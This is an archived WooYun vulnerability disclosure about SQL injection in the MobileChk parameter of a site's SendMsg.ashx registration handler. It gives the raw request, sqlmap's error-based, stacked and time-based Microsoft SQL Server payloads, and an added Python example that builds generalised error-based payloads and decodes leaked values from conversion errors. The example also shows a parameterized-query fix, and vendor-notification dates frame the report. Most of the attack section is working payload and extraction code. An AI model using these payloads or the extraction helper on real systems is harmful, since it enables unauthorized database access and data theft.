WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
2015-11-27: Details sent to the vendor; awaiting the vendor's response
2015-12-01: Vendor confirmed; details disclosed to the vendor only
2015-12-11: Details disclosed to core white hats and experts in the relevant field
2015-12-21: Details disclosed to regular white hats
2015-12-31: Details disclosed to intern white hats
2016-01-15: Details disclosed to the public
RT (as per the title)
Vulnerable endpoint:
POST /ashx/SendMsg.ashx HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 21
Accept: text/plain, */*; q=0.01
Origin: http://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/Register.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_d71f39ec68e78d8cdfff5c873ae7666a=1448456767; Hm_lpvt_d71f39ec68e78d8cdfff5c873ae7666a=1448456767; ASP.NET_SessionId=mp1kwsi5o30rcrymhr4o3qre

MobileChk=18988888888
The MobileChk POST parameter (the mobile-number check used by the registration page) is injectable; the value is placed inside a single-quoted string literal in the back-end query, so a closing quote followed by attacker SQL is executed. sqlmap confirms three techniques (error-based, stacked queries, and time-based blind):
---
Parameter: MobileChk (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: MobileChk=18616791169' AND 1096=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1096=1096) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(122)+CHAR(113))) AND 'pgpB'='pgpB

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: MobileChk=18616791169';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: MobileChk=18616791169' WAITFOR DELAY '0:0:5'--
---
[21:11:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
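To make the sqlmap output above concrete, here is an added example (not code from the WooYun report, sqlmap, or the affected site). It assumes the handler builds its query by string concatenation around a single-quoted MobileChk value (the only thing the page shows is the request and sqlmap's verdict, so the handler shape, table name `Users` and column `Mobile` are assumptions, simulated on SQLite). It shows three things: why the `' AND ... AND 'pgpB'='pgpB` tail lets an attacker steer a yes/no question through the query; how the error-based payload smuggles a value out through SQL Server's CONVERT(INT, ...) conversion error between the `qqxxq` / `qxzzq` markers built from CHAR() calls; and the parameterized form of the same lookup, which treats the whole value as data.

```python
"""Added example for the MobileChk injection on this page. The handler's
query, the Users table and the Mobile column are assumptions; SQLite stands
in for SQL Server for the concatenation/parameterization comparison."""
import re
import sqlite3
from typing import Optional

# Marker strings from the page's payload: CHAR(113)+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(113)
# spells 'qqxxq', and CHAR(113)+CHAR(120)+CHAR(122)+CHAR(122)+CHAR(113) spells 'qxzzq'.
PREFIX = "qqxxq"
SUFFIX = "qxzzq"


def mssql_chars(s: str) -> str:
    """Encode a string as a CHAR()+CHAR() concatenation, so the payload needs no
    extra quote characters (the same trick sqlmap used on this page)."""
    return "+".join(f"CHAR({ord(c)})" for c in s)


def build_error_based_payload(mobile: str, expression: str) -> str:
    """Generalize the page's error-based payload: instead of the 1096=1096 CASE
    (which only leaks '1' or '0'), wrap an arbitrary SQL Server expression such
    as @@version so its value lands in the conversion error message."""
    inner = f"{mssql_chars(PREFIX)}+CAST(({expression}) AS NVARCHAR(4000))+{mssql_chars(SUFFIX)}"
    return f"{mobile}' AND 1096=CONVERT(INT,(SELECT {inner})) AND 'pgpB'='pgpB"


# SQL Server message 245 as emitted by SQL Server 2008 (the DBMS sqlmap identified).
_CONVERSION_ERROR = re.compile(
    r"Conversion failed when converting the n?varchar value '(.*?)' to data type int"
)


def decode_error_based(response_body: str) -> Optional[str]:
    """Pull the leaked value out of a response carrying the conversion error.
    Returns None when the page did not echo the error (e.g. custom error pages),
    in which case the blind techniques in the sqlmap output are the fallback."""
    m = _CONVERSION_ERROR.search(response_body)
    if not m:
        return None
    leaked = m.group(1)
    if leaked.startswith(PREFIX) and leaked.endswith(SUFFIX):
        return leaked[len(PREFIX):-len(SUFFIX)]
    return None


def make_demo_db() -> sqlite3.Connection:
    """Constructed sample data: one registered number so the lookup can hit."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Id INTEGER PRIMARY KEY, Mobile TEXT)")
    conn.execute("INSERT INTO Users (Mobile) VALUES ('18616791169')")
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, mobile_chk: str) -> int:
    """Assumed shape of the vulnerable handler: the raw parameter is spliced into
    the query text, so a value like  x' AND 1=2 AND 'pgpB'='pgpB  becomes SQL."""
    sql = f"SELECT COUNT(*) FROM Users WHERE Mobile='{mobile_chk}'"
    return conn.execute(sql).fetchone()[0]


def safe_lookup(conn: sqlite3.Connection, mobile_chk: str) -> int:
    """Hardened form: a bound parameter. The same input is compared as one
    literal string and never reaches the SQL parser as code."""
    sql = "SELECT COUNT(*) FROM Users WHERE Mobile=?"
    return conn.execute(sql, (mobile_chk,)).fetchone()[0]


if __name__ == "__main__":
    db = make_demo_db()
    true_probe = "18616791169' AND 1=1 AND 'pgpB'='pgpB"
    false_probe = "18616791169' AND 1=2 AND 'pgpB'='pgpB"
    print("vulnerable:", vulnerable_lookup(db, true_probe), vulnerable_lookup(db, false_probe))
    print("parameterized:", safe_lookup(db, true_probe), safe_lookup(db, false_probe))
    print(build_error_based_payload("18616791169", "@@version"))
    # Constructed response body, in the format SQL Server 2008 uses for message 245.
    body = "Conversion failed when converting the varchar value 'qqxxq1qxzzq' to data type int."
    print("leaked:", decode_error_based(body))
```

In the vulnerable path the two probes return different counts (1 and 0), which is exactly the bit sqlmap's boolean and error-based techniques turn into data; in the parameterized path both return 0 because no row has that whole string as its mobile number. The decoder is the piece that turns the page's CONVERT(INT, ...) payload into an extraction primitive once the application echoes database errors.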
Fix suggestion: filter the input. (Blacklist filtering alone is fragile; the reliable fix is to pass MobileChk to the query as a bound parameter rather than concatenating it into the SQL text.)
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-12-01 15:22
CNVD has confirmed and reproduced the described vulnerability; it has been forwarded by CNCERT to the Fujian branch centre, which will coordinate remediation with the organization operating the site.
None yet